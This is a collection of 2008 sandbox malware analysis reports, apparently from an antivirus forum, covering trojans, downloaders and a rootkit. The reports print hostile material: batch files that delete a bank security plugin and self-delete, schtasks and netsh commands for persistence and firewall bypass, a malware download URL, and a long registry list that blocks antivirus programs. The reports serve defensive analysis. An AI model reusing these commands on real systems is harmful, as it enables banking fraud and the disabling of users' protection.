    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\  zsmscc = rundll32.exe C:\WINDOWS\system32\zsmscc071001.dll mymain
    // the program is run automatically at system start
  New processes (path, program, arguments):
    c:\windows\system32\rundll32.exe  C:\WINDOWS\system32\zsmscc071001.dll mymain
    c:\windows\system32\cmd.exe       /c c:\nmDelm.bat   // 2nd run of cmd.exe
Behaviour of rundll32.exe:
  Files created:
    c:\downf.bat
  Files written:
    C:\downf.bat
  New processes (path, program, arguments):
    c:\windows\system32\cmd.exe  /c c:\downf.bat   // 1st run of cmd.exe
Behaviour of cmd.exe (1st run):
  New processes (path, program, arguments):
    c:\windows\system32\zsmscc071001.exe  i
  Files deleted:
    C:\downf.bat
Behaviour of cmd.exe (2nd run):
  Files deleted:
    %Path%\cao.exe   // %Path% is the directory cao.exe was run from
    C:\nmDelm.bat
Behaviour of zsmscc071001.exe:
  Files created:
    C:\WINDOWS\system32\zsmscc32.dll
  Files written:
    C:\WINDOWS\zsmscc16.ini
    C:\WINDOWS\system32\zsmscc32.dll
  New processes (path, program, arguments):
    c:\program files\internet explorer\iexplore.exe  (no arguments)
  Memory access in another process:
    c:\program files\internet explorer\iexplore.exe
  Thread created in another process:
    c:\program files\internet explorer\iexplore.exe
Behaviour of iexplore.exe:
  No suspicious behaviour   // but it was started and injected into by zsmscc071001.exe, so the network activity noted below is most likely its
Additional information:
  Other behaviour:
    1. Network activity
  Contents of nmDelm.bat:
    :try
    del "C:\Documents and Settings\VMware\桌面\tavo\cao_vcc_kitman231\cao.exe"
    if exist "C:\Documents and Settings\VMware\桌面\tavo\cao_vcc_kitman231\cao.exe" goto try
    del %0
  Contents of downf.bat:
    "C:\WINDOWS\system32\zsmscc071001.exe" i
    del %0
Result:
  Virus type: Trojan
  Virus file name: Trojan2008.12.24@002

Analysis report: first.exe
General information:
  Analysis date: 2008-12-10
  Executable: yes
  File type: EXE
  Uploader: kitman231
  Analyst: integear
Process tree:
  first.exe
  └ delme.bat
    └ hgcheck.exe
Behaviour of first.exe:
  Files created:
    C:\Documents and Settings\[User Name]\delme.bat   // dropped file
    C:\Windows\System32\hgcheck.exe                   // dropped file
    first.exe                                         // parent
  New processes:
    first.exe   // parent
  Files downloaded:
    http://www.Msnupdateslive.com/download/hgcheck.jpg   // no other notable behaviour; the file is packed
Result:
  Virus type: Trojan-Downloader
  Virus file name: Trojan2008.12.24@003

Analysis report: hgcheck.exe
General information:
  Analysis date: 2008-12-10
  Executable: yes
  File type: EXE
  Uploader: kitman231
  Analyst: integear
Process tree:
  hgcheck.exe
  └ svchost.exe
Behaviour of hgcheck.exe:
  Files created:
    hgcheckt.exe   // parent
    svchost.exe    // dropped file
  New processes:
    hgcheckt.exe   // parent
  Notes: there is inconspicuous download activity.
Result:
  Virus type: Trojan-Downloader
  Virus file name: Trojan2008.12.24@004

Analysis report: kl.exe
General information:
  Analysis date: 2008-12-03
  Executable: yes
  File type: EXE (packed with ASProtect)
  Uploader: kitman231
  Analyst: 000110
Process tree:
  kl.exe
  ├ netsh.exe
  ├ schtasks.exe
  ├ reg.exe (1st run)
  ├ reg.exe (2nd run)
  └ reg.exe (3rd run)
Behaviour of kl.exe:
  Files deleted:
    C:\AUTOEXEC.BAT   // dangerous: AUTOEXEC.BAT is an important system file
  Files created:
    C:\windows\system\win.exe
    c:\remove\remove.CMD
    c:\autoexec.bat   // the trojan's own replacement (contents below)
    C:\Windows\System32\Gbpsv.exe   // named like GbPlugin's own GbpSv.exe, which the batch below deletes
    C:\remove\psexec.exe
    C:\remove\pskill.exe
    C:\remove\SetACL.exe
    C:\remove\movefile.exe
    C:\remove\mata.CMD
    C:\remove\deleta.CMD
    C:\remove\removeGB.CMD
    C:\remove\setreg.CMD
    C:\remove\clngbuster.reg
    C:\wscntfy.dat
    C:\WINDOWS\system32\REGISTRANDO_007.txt
  Files written:
    C:\WINDOWS\system\win.exe
    C:\remove\remove.CMD
    C:\autoexec.bat
    C:\WINDOWS\system32\Gbpsv.exe
    C:\remove\psexec.exe
    C:\remove\pskill.exe
    C:\remove\SetACL.exe
    C:\remove\movefile.exe
    C:\remove\mata.CMD
    C:\remove\deleta.CMD
    C:\remove\removeGB.CMD
    C:\remove\setreg.CMD
    C:\remove\clngbuster.reg
  Registry values set under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:
    Windows32 = C:\windows\system\win.exe
    Gbpsv.exe = C:\Windows\System32\Gbpsv.exe
    // both programs run at every system start
  New processes (path, program, arguments):
    c:\windows\system32\netsh.exe     firewall add allowedprogram C:\windows\system\win.exe RPCCC   // adds an allow rule so win.exe gets through the built-in Windows firewall
    c:\windows\system32\schtasks.exe  /create /tn startt /tr c:\autoexec.bat /sc onstart /ru system   // creates a scheduled task that runs the batch as SYSTEM at start-up
    c:\windows\system32\reg.exe       add "HKCU\Software\Sysinternals\PsExec" /v EulaAccepted /t REG_DWORD /d "0x00000001" /f
    c:\windows\system32\reg.exe       add "HKCU\Software\Sysinternals\PsKill" /v EulaAccepted /t REG_DWORD /d "0x00000001" /f
    c:\windows\system32\reg.exe       add "HKCU\Software\Sysinternals\Movefile" /v EulaAccepted /t REG_DWORD /d "0x00000001" /f
    // the EulaAccepted values let the bundled Sysinternals tools in C:\remove run without showing their licence dialog
Behaviour of schtasks.exe:
  Files created:
    C:\WINDOWS\Tasks\startt.job
  Files written:
    C:\WINDOWS\Tasks\startt.job
Behaviour of netsh.exe:
  Registry values set:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\
      C:\WINDOWS\system\win.exe = C:\WINDOWS\system\win.exe:*:Enabled:RPCCC
Behaviour of reg.exe (1st run):
  Registry values set:
    HKCU\Software\Sysinternals\PsExec  EulaAccepted = 0x00000001
Behaviour of reg.exe (2nd run):
  Registry values set:
    HKCU\Software\Sysinternals\PsKill  EulaAccepted = 0x00000001
Behaviour of reg.exe (3rd run):
  Registry values set:
    HKCU\Software\Sysinternals\Movefile  EulaAccepted = 0x00000001
Additional information:
  Other behaviour: none
  Contents of AUTOEXEC.BAT (the paths are those of a Portuguese-language Windows, where "Arquivos de programas" is Program Files; GbPlugin is a browser plugin banks use to protect online banking):
    @echo off
    cd\
    del/s/q c:\windows\downlo~1\gb*.*
    attrib -h -r -s "C:\Arquivos de programas\GbPlugin\*.exe" /s/q
    rd /s/q "C:\Arquivos de programas\GbPlugin\*.exe"
    del/s/q c:\windows\downlo~1\*.g??
    del/s/q c:\windows\downlo~1\g*.*
    del/s/q c:\arquiv~1\GbPlugin\g*.*
    del/s/q c:\arquiv~1\GbPlugin\GbpSv.exe
    del/s/q c:\arquiv~1\GbPlugin\gbiehcef.DLL
    del/s/q c:\arquiv~1\GbPlugin\gbiehabn.dll
    del/s/q c:\arquiv~1\GbPlugin\gbieh.dll
    del/s/q c:\arquiv~1\GbPlugin\Cef.gpc
    del/s/q c:\arquiv~1\GbPlugin\Bb.gpc
    del/s/q c:\arquiv~1\GbPlugin\*.gmd
    del/s/q c:\arquiv~1\GbPlugin\*.exe
    del/s/q c:\arquiv~1\GbPlugin\*.dll
    del/s/q c:\arquiv~1\Scpad\*.dll
    del/s/q c:\arquiv~1\Scpad\*.bin
    del/s/q c:\arquiv~1\GbPlugin\*.gmd
    del/s/q c:\arquiv~1\GbPlugin\*.gpc
    del/s/q c:\arquiv~1\GbPlugin\*.gmd
    @echo.
    ^z
  Contents of startt.job:
    runs c:\autoexec.bat at system start
Result:
  Virus type: Trojan-Agent
  Virus file name: Trojan2008.12.24@005

Analysis report: securefileshredderinstallerdualen.exe
General information:
  Analysis date: 2008-12-03
  Executable: yes
  File type: EXE (installer)
  Uploader: kitman231
  Analyst: 000110
Process tree:
  securefileshredderinstallerdualen.exe
  └ sfssetupdual.exe (1st run)
    └ sfssetupdual.tmp (in the is-3i6ur.tmp\ folder)
      └ sfssetupdual.exe (2nd run)
        └ sfssetupdual.tmp (in the is-0r26f.tmp\ folder)
          ├ taskkill.exe
          ├ regsvr32.exe
          ├ fileshredder.exe
          └ filemonitor.exe
Behaviour of securefileshredderinstallerdualen.exe:
  Registry values set:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\  SecureFileShredderDownloader = %Path%\SecureFileShredderInstallerDualEn_wc_kitman231.exe
    // %Path% is the directory SecureFileShredderInstallerDualEn_wc_kitman231.exe was run from
  Files created:
    C:\Documents and Settings\[User Name]\Local Settings\Temporary Internet Files\Content.IE5\5YNF88C6\SecureFileShredderSetupDualEn[1].exe   // downloaded from the internet
    C:\Documents and Settings\[User Name]\Local Settings\Temp\FileShredderSetup\SFSSetupDual.exe
  Files written:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\FileShredderSetup\SFSSetupDual.exe
  Folders created:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\FileShredderSetup
  Registry values deleted:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\  SecureFileShredderDownloader
  New processes (path, program, arguments):
    c:\documents and settings\[User Name]\local settings\temp\fileshreddersetup\sfssetupdual.exe  /tid=6200
Behaviour of sfssetupdual.exe (1st run):
  Folders created:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-3I6UR.tmp
  Files created:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-3I6UR.tmp\SFSSetupDual.tmp
  Files written:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-3I6UR.tmp\SFSSetupDual.tmp
  New processes (path, program, arguments):
    c:\documents and settings\[User Name]\local settings\temp\is-3i6ur.tmp\sfssetupdual.tmp  /SL5="$602E8,1173147,53248,C:\DOCUME~1\[User Name]\LOCALS~1\Temp\FileShredderSetup\SFSSetupDual.exe" /tid=6200
Behaviour of sfssetupdual.tmp (1st run):
  Folders created:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp
  Files created:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp\_isetup\_RegDLL.tmp
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp\_isetup\_shfoldr.dll
  Files written:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp\_isetup\_RegDLL.tmp
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp\_isetup\_shfoldr.dll
  New processes (path, program, arguments):
    c:\documents and settings\[User Name]\local settings\temp\fileshreddersetup\sfssetupdual.exe  /verysilent /norestart /sl5="$602e8,1173147,53248,c:\docume~1\[User Name]\locals~1\temp\fileshreddersetup\sfssetupdual.exe" /tid=6200
  Files deleted:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp\_isetup\_RegDLL.tmp
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp\_isetup\_shfoldr.dll
  Folders deleted:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp
Behaviour of sfssetupdual.exe (2nd run):
  Files deleted:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-3I6UR.tmp\SFSSetupDual.tmp
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-0R26F.tmp\SFSSetupDual.tmp
  Folders created:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-0R26F.tmp
  Files created:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-0R26F.tmp\SFSSetupDual.tmp
  Folders deleted:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-3I6UR.tmp
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-0R26F.tmp
  New processes (path, program, arguments):
    c:\documents and settings\[User Name]\local settings\temp\is-0r26f.tmp\sfssetupdual.tmp  /SL5="$702E8,1173147,53248,C:\DOCUME~1\[User Name]\LOCALS~1\Temp\FileShredderSetup\SFSSetupDual.exe" /verysilent /norestart /sl5="$602e8,1173147,53248,c:\docume~1\[User Name]\locals~1\temp\fileshredderset   (argument string truncated in the source)
Behaviour of sfssetupdual.tmp (2nd run):
  Folders created:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp
  Files created:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_RegDLL.tmp
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_shfoldr.dll
    C:\Program Files\SecureFileShredder\unins000.dat
    C:\Program Files\SecureFileShredder\is-3NR36.tmp
    C:\Program Files\SecureFileShredder\unins000.exe
    C:\Program Files\SecureFileShredder\is-3JKNR.tmp
    C:\Program Files\SecureFileShredder\FileShredder.exe
    C:\Program Files\SecureFileShredder\is-SOE7C.tmp
    C:\Program Files\SecureFileShredder\FileMonitor.exe
    C:\Program Files\SecureFileShredder\is-11JU9.tmp
    C:\Program Files\SecureFileShredder\FileShredder.xml
    C:\Program Files\SecureFileShredder\is-QMNV3.tmp
    C:\Program Files\SecureFileShredder\securefileshredder.url
    C:\Program Files\SecureFileShredder\is-9QPAD.tmp
    C:\Program Files\SecureFileShredder\FileShredder.ico
    C:\Program Files\SecureFileShredder\is-82A76.tmp
    C:\Program Files\SecureFileShredder\ExtSFS.dll
    C:\Program Files\SecureFileShredder\is-EKPCD.tmp
    C:\Program Files\SecureFileShredder\FShellEx.dll
    C:\Program Files\SecureFileShredder\is-0EIGP.tmp
    C:\Program Files\SecureFileShredder\SafeOper.dll
    C:\Program Files\SecureFileShredder\is-9KQPP.tmp
    C:\Program Files\SecureFileShredder\ExpBtn.dll
    C:\Documents and Settings\All Users\「開始」功能表\程式集\SecureFileShredder\Launch SecureFileShredder.lnk
    C:\Documents and Settings\All Users\「開始」功能表\程式集\SecureFileShredder\SecureFileShredder Home Page.lnk
    C:\Documents and Settings\All Users\桌面\Secure FileShredder.lnk
    C:\Documents and Settings\[User Name]\Application Data\Microsoft\Internet Explorer\Quick Launch\SecureFileShredder.lnk
  Files written:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_RegDLL.tmp
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_shfoldr.dll
    C:\Program Files\SecureFileShredder\is-3NR36.tmp
    C:\Program Files\SecureFileShredder\is-3JKNR.tmp
    C:\Program Files\SecureFileShredder\is-SOE7C.tmp
    C:\Program Files\SecureFileShredder\is-11JU9.tmp
    C:\Program Files\SecureFileShredder\is-QMNV3.tmp
    C:\Program Files\SecureFileShredder\is-9QPAD.tmp
    C:\Program Files\SecureFileShredder\is-82A76.tmp
    C:\Program Files\SecureFileShredder\is-EKPCD.tmp
    C:\Program Files\SecureFileShredder\is-0EIGP.tmp
    C:\Documents and Settings\All Users\「開始」功能表\程式集\SecureFileShredder\Launch SecureFileShredder.lnk
    C:\Documents and Settings\All Users\「開始」功能表\程式集\SecureFileShredder\SecureFileShredder Home Page.lnk
    C:\Documents and Settings\All Users\桌面\Secure FileShredder.lnk
    C:\Documents and Settings\[User Name]\Application Data\Microsoft\Internet Explorer\Quick Launch\SecureFileShredder.lnk
    C:\Program Files\SecureFileShredder\unins000.dat
  Registry values set:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\
      {FEAED91E-FB2D-4842-8593-CB82B1A4222D} = SecureFileShredder shell extention
      {D99C619E-00DE-44bc-8870-D3030D4708B4} = SecureFileShredder shell extention
      // these 2 changes alter the right-click menu
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
      SecureFileShredder = C:\Program Files\SecureFileShredder\FileShredder.exe
      FileMonitor = C:\Program Files\SecureFileShredder\FileMonitor.exe
      // these 2 changes run the named programs at every system start
  Files deleted:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_RegDLL.tmp
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_shfoldr.dll
  Folders deleted:
    C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp
  New processes (path, program, arguments):
    c:\windows\system32\taskkill.exe  /F /IM FileShredder.exe
    c:\windows\system32\taskkill.exe  /F /IM FileMonitor.exe
    c:\windows\system32\regsvr32.exe  /s "C:\Program Files\SecureFileShredder\ExtSFS.dll"
    c:\windows\system32\regsvr32.exe  /s "C:\Program Files\SecureFileShredder\FShellEx.dll"
    c:\windows\system32\regsvr32.exe  /s "C:\Program Files\SecureFileShredder\SafeOper.dll"
    c:\windows\system32\regsvr32.exe  /s "C:\Program Files\SecureFileShredder\ExpBtn.dll"
    c:\program files\securefileshredder\fileshredder.exe
    c:\program files\securefileshredder\filemonitor.exe
Behaviour of taskkill.exe:
  Files written:
    \Device\NamedPipe\lsarpc   // looks up running applications through the pipe
Behaviour of regsvr32.exe:
  Registry keys created:
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\SFSShellExtension
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\SFSShellExtension
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shellex\ContextMenuHandlers\SFSShellExtension
  Registry values set:
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\          SFSShellExtension = {FEAED91E-FB2D-4842-8593-CB82B1A4222D}
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\  SFSShellExtension = {FEAED91E-FB2D-4842-8593-CB82B1A4222D}
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shellex\ContextMenuHandlers\  SFSShellExtension = {7915AA00-43C5-432d-800D-6F3FD2590F12}
    // these 3 changes alter the right-click menu (the CLSID is the Recycle Bin)
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar\  {D99C619E-00DE-44bc-8870-D3030D4708B4} = (value not shown in the source)
    // this 1 change alters the Internet Explorer toolbar
Additional information:
  Other behaviour:
    1. c:\windows\system32\svchost.exe writes \Device\NamedPipe\lsarpc   // follow-on from taskkill.exe
    2. c:\windows\system32\wbem\wmiprvse.exe writes \Device\NamedPipe\lsarpc   // follow-on from taskkill.exe
Result:
  Virus type: Trojan-Downloader
  Virus file name: Trojan2008.12.24@006

Analysis report: setup.exe
General information:
  Analysis date: 2008-12-05
  Executable: yes
  File type: EXE
  Uploader: integear
  Analyst: integear
Process tree:
  setup.exe     // parent
  └ zuhrn0.cmd  // dropped file
Behaviour of setup.exe:
  Files created:
    setup.exe    // parent
    zuhrn0.cmd   // dropped file
  New processes:
    setup.exe    // parent
  Notes: unidentified download activity.
Result:
  Virus type: Trojan-Downloader
  Virus file name: Trojan2008.12.24@007

Analysis report: w32time.dll
  Sample name: w32time.dll
  Type: Trojan-KillAV-Rootkit
  Virus file name: Trojan2008.12.24@008
  Uploader: kitman231
  Analyst: asusp4b533
  Analysis date: 20081206
  Analysis tool: ThreatExpert
  Executable: yes
Files created:
  c:\autorun.inf
  %Temp%\242687
  %Temp%\345234.txt
  %Temp%\345328
  c:\system.dll
  %System%\appwinproc.dll
  %System%\Nskhelper2.sys
  %System%\NsPass0.sys
  %System%\NsPass1.sys
  %System%\NsPass2.sys
  %System%\NsPass3.sys
  %System%\NsPass4.sys
Process and memory behaviour:
  Remote memory allocation:
    in %System%\svchost.exe
  Remote DLL injection:
    %System%\appwinproc.dll -> %Windir%\explorer.exe
                            -> %ProgramFiles%\messenger\msmsgs.exe
                            -> %Windir%\dns\sdnsmain.exe
                            -> %System%\svchost.exe
    w32time.dll -> generic host process filename -> %System%\svchost.exe
  Drivers loaded:
    %System%\nskhelper2.sys
    %System%\nspass0.sys
    %System%\nspass1.sys
    %System%\nspass2.sys
    %System%\nspass3.sys
    %System%\nspass4.sys
Registry keys created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safebox.exe
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ACKWIN32.exe
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANTI-TROJAN.exe
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\anti.exe
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antivir.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atrack.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AUTODOWN.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCONSOL.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVE32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGCTRL.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avk.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKSERV.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPUPD.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVSCHED32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avsynmgr.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWIN95.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avxonsol.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKD.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKICE.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIADMIN.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIAUDIT.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File 
Execution Options\CFIND.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95CT.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER3.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DAVPFW.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dbg.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\debu.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DV95.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DV95_O.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DVP95.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ECENGINE.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EFINET32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESAFE.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESPWATCH.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorewclass.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-AGNT95.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Image File Execution Options\F-PROT.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-prot95.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-stopw.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FINDVIRU.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fir.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fp-win.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FRW.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMAPP.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMSERV.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMASN.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMAVSP.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ice.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOAD95.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOADNT.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICMOON.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICSSUPPNT.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iom.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iomon98.exe o 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JED.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kabackreport.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kasmain.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kav32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kavstart.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kissvc.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kpfwsvc.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPPMain.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRF.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVPreScan.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kwatch.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File 